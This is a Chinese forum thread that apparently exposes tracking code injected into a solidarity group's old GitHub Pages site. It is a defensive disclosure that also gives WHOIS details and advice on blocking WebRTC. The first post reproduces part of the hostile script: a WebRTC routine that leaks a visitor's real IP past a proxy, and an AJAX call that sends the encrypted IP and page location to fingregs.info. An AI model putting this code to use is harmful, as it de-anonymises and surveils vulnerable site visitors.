原声援团官网疑似被植入追踪代码


#1

1月26号,原声援团官网 jiashigrsyt.github.io 进行了一个奇怪的更新,加入了一段js脚本,具体如下:
https://github.com/jiashigrsyt/jiashigrsyt.github.io/commit/62d3df6175da53a8a22c27e6959669d7185b1d8f

引入了 www.fingregs.info/jQuery-2.8.min.js 的js脚本

fingregs.info域名是在18年9月时注册的,注册人不详,直接访问 www.fingregs.info会跳转到google

插入的js脚本经过混淆,但是可以辨别出插入了fingerprintJS evercookie等具有追踪功能的js代码,可以搜索下面这两句话

/* * fingerprintJS 0.5.5 - Fast browser fingerprint library

/* * evercookie 0.3 (09/20/2010) – extremely persistent cookies * * by samy kamkar

里面还使用了一段利用webrtc漏洞获取ip地址的代码,特定情况下应该可以绕过代理

$.ajax({type:“post”,url:“www.fingregs.info/search.jsp”,data:“data=”+encodeURIComponent(data)+">>"+encodeURIComponent(encrypt.encrypt(“relation=BUEhNKl7&type=O3B46gd7M0oMDUm1rIe8EgRD1jbMw4kk9yna4aVQ”))+">>"+encodeURIComponent(encrypt.encrypt(“ip=”+obj.query)),success:function(ret){}}); }); function getIPs(callback) { var ip_dups = {}; var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; var useWebKit = !!window.webkitRTCPeerConnection; if (!RTCPeerConnection) { var win = iframe.contentWindow; RTCPeerConnection = win.RTCPeerConnection || win.mozRTCPeerConnection || win.webkitRTCPeerConnection; useWebKit = !!win.webkitRTCPeerConnection; } var mediaConstraints = {optional: [{RtpDataChannels: true}]}; var servers = {iceServers: [{urls: “stun:stun.services.mozilla.com”}]}; var pc = new RTCPeerConnection(servers, mediaConstraints); function handleCandidate(candidate) { var ip_regex = /([0-9]{1,3}(.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/ var ip_addr = ip_regex.exec(candidate)[1]; if (ip_dups[ip_addr] === undefined) callback(ip_addr); ip_dups[ip_addr] = true; } pc.onicecandidate = function(ice) { if(ice.candidate) handleCandidate(ice.candidate.candidate); }; pc.createDataChannel(""); pc.createOffer(function(result) { pc.setLocalDescription(result, function() {},function() {}); }, function() {}); setTimeout(function() { var lines = pc.localDescription.sdp.split(’\n’); lines.forEach(function(line) { if (line.indexOf(‘a=candidate:’) === 0) handleCandidate(line); }); }, 1000); } getIPs(function(ip) { var tmp = “location=” + escape((function() { try { return document.location.href } catch(e) { return “” } })()) + “&ip=” + ip; var data = “”; if(tmp.length > 90) { var num=Math.ceil(tmp.length/90); for(var j=0;j"; } data=data.substring(0,data.length-1); } else { data=encrypt.encrypt(tmp); }

其他地方没有细看,但感觉十分奇怪了,想不到任何的正常用途会需要这些追踪功能。


#2

楼主好,请问这会对访问网站的人有什么潜在威胁。电脑小白不是很懂


#3

在大多数情况下,浏览器使用代理工具的可以使你真正的IP被隐藏起来,但是WebRTC可以绕过代理直接访问服务器,导致你的真实IP被泄露。

另外一个通过cookie追踪的功能我也不是太熟悉。但是可以肯定,注入这一系列代码肯定是问了特定出查看网页的人来。


#4

如果使用Firefox浏览器或者Chrome浏览器,可以使用附加组件来屏蔽WebRTC

另外,建议在Windows系统下使用Firefox浏览器的用户下载非中文版的安装之后再安装中文语言包。中文版是北京谋智公司负责的,鬼知道他会添加些什么奇怪的东西。


#5

刚才使用Firefox浏览器看了一下Cookie以及跟踪器,结果如下:

S1

S2

通过简单的搜索发现www.fingregs.info的IP位于Digital Ocean.

当然如果该网站使用了CDN的话又是另外一回事了。总之先给Digital Ocean发了一封举报信,处不处理就不知道了。

另外附上WHOIS信息

Domain Name: FINGREGS.INFO
Registry Domain ID: D503300000129784200-LRMS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-11-05T20:33:04Z
Creation Date: 2018-09-06T03:05:58Z
Registry Expiry Date: 2019-09-06T03:05:58Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: 1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/eppclientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/eppclientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/eppclientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/eppclientUpdateProhibited
Registrant Organization:
Registrant State/Province: Beijing
Registrant Country: CN
Name Server: NS77.DOMAINCONTROL.COM
Name Server: NS78.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form is https://www.icann.org/wicf/
Last update of WHOIS database: 2019-02-11T05:32:49Z


#6

听说声援团网站是八青年建的,那么现在当他们被捕后,自然网站也就落入敌手了


#7

给出的网址已经很久没更新了,后来应该转移到这里了: https://jiashigrsyt1.github.io


#8

若有空的话,还请懂技术的同志帮忙看看新官网有无问题,提前谢谢了~


#9

版主说的原网站大家就不要上了(胆子大的可以上去看看)
新的网站是https://jiashigrsyt1.github.io
新的网站检查过代码,没有被其他人修改的痕迹,大家可以正常访问。


#10

建议 https://jiashigrsyt1.github.io/ 在醒目位置写上 https://jiashigrsyt.github.io/ 被植入追踪代码的消息以予警示。